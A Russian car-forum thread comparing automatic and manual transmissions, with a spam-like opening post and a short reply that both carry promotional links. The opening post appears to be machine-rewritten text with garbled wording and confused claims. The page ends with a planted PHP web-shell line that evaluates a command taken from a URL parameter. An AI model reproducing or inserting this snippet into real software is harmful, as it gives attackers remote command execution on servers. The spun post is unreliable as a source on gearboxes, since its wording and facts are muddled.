+ Ответить в теме
Показано с 1 по 2 из 2

Тема: Автомат или механика?


  1. #1
    Мимо проходил gerasimdanov is on a distinguished road Аватар для gerasimdanov
    Регистрация
    31.01.2021
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    0

    Автомат или механика?


    При покупке новой тачки не заключительную роль играет вид коробки передач, введенной на ней. На нынешний день все использующиеся коробки можно поделить на автоматические и неавтоматизированные КПП. Что презентует собой каждая из видов коробок передач, какими основательными и негативными параметрами обладают? Давайте, сперва рассмотрим назначение и строение. КПП предназначена для нескольких задач:
    - изменения вращающего момента,
    - изменения скорости,
    - коррекции направления движения автомобиля,
    - разделения движка и коробки и, напротив, их соединения,
    - блокировки гидротрансформатора.
    При этом одни КПП имеют возможности решать все эти задачи, а другие, как например, механическая, только главные, - варьирование крутящего момента и скорости. План устройства зависит от типа КПП.
    Броским примером классической АКПП считается именно гидромеханический вид, он же гидроавтомат. В отсутствии прямой связи между движком и колесами, состоит исключение данного типа акпп. Встает вопрос о том, - каким же образом крутящий момент передается? Ответ прост, - 2 турбинами и рабочей жидкостью. В следствие дальнейшей "эволюции" такого вида "автомата" роль регулирования в них взяли на себя спец электронные конструкции, что дало возможность прибавить в такие АКПП своеобразные "зимний" и "спортивный" режимы, появилась программа для практичной езды и способность переключать передачи "руками".
    В отличие от механической коробки переключения передач гидромеханическому "автотранспорту" бензина требуется несколько больше и времени на разгон нужно больше. Но эта та ценность, которую требуется заплатить за комфортность. И именно "гидравлика", бросив вызов "механике", одержала удостоверенную победу во многих странах.
    Выгоды и минусы. Это самое простое по конструкции решение, а значит самое копеечное, прочное. Остальное все зависит от профессионализма водителя. Если шоферский стаж маленький, то выбрать нужную передачу непросто. Поэтому появляются минусы, - невысокая динамика, гигантский расход топлива. Если трудовой стаж гигантский, то эти отрицательные качества пропадают, появляются положительные моменты, удачно, вовремя проделанное переключение уменьшает расход топлива, серьёзно повышает динамику движения. Недостатков 2. МКПП нужно уметь применять удачно. У новичков постоянные затруднения со сцеплением, им нужно пользоваться плавно, не каждому дано, особенно при перемещении с участка, в горку. О трате топлива, динамике уже упомянули. Еще один недосмотр. При насыщенном автомобильном потоке, муниципальных пробках "ручка" доставляет наибольшее число трудностей, потому что постоянно необходимо работать рычагом, педалями сцепления и ускорителя. Также, мы предлагаем познакомиться с информацией детальнее https://otoba.ru/auto/hyundai/creta-1-dvigateli.html.
    Подводя выводы, можно сказать, что подбор авто с позиции типа коробочки передач должен быть осознанным. Механику оценят опытнейшие автомобилисты, обожающие активное движение и желающие собственноручно управлять автомашиной. Автомат подойдет людям, для которых удобство имеет большее значение, чем экономия топлива и динамика разгона. Также автомат будет более благоприятен в условиях большого мегаполиса с его неминуемыми, нескончаемыми пробками.

  2. #2
    GTI-Racing Arkadiy1988 is on a distinguished road Аватар для Arkadiy1988
    Регистрация
    03.03.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    271
    Ну чинить механику проще, да и я все время ездил на механике, на ней привычнее ) А вот тут https://ukrparts.com.ua/catalog/kovriki-449/ кстати по запчастям не сложно найти на обе машины )

+ Ответить в теме

Похожие темы

  1. Автомат наГ4
    от Goash в разделе Golf 4
    Ответов: 12
    Последнее сообщение: 01.07.2024, 20:11
  2. Гольф 4 1.8 автомат
    от vadyurik в разделе Покупка и продажа авто
    Ответов: 0
    Последнее сообщение: 03.02.2010, 17:45
  3. Вас Тревожит Автомат?
    от CTAKAH в разделе Разное
    Ответов: 3
    Последнее сообщение: 28.10.2008, 17:13
  4. Автомат на MK3
    от Dj_chek_one в разделе Отзывы / Выбор
    Ответов: 29
    Последнее сообщение: 13.05.2008, 02:41
  5. Автомат jetta 2
    от Butek996 в разделе Ремонт и обслуживание
    Ответов: 0
    Последнее сообщение: 11.09.2007, 21:56

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}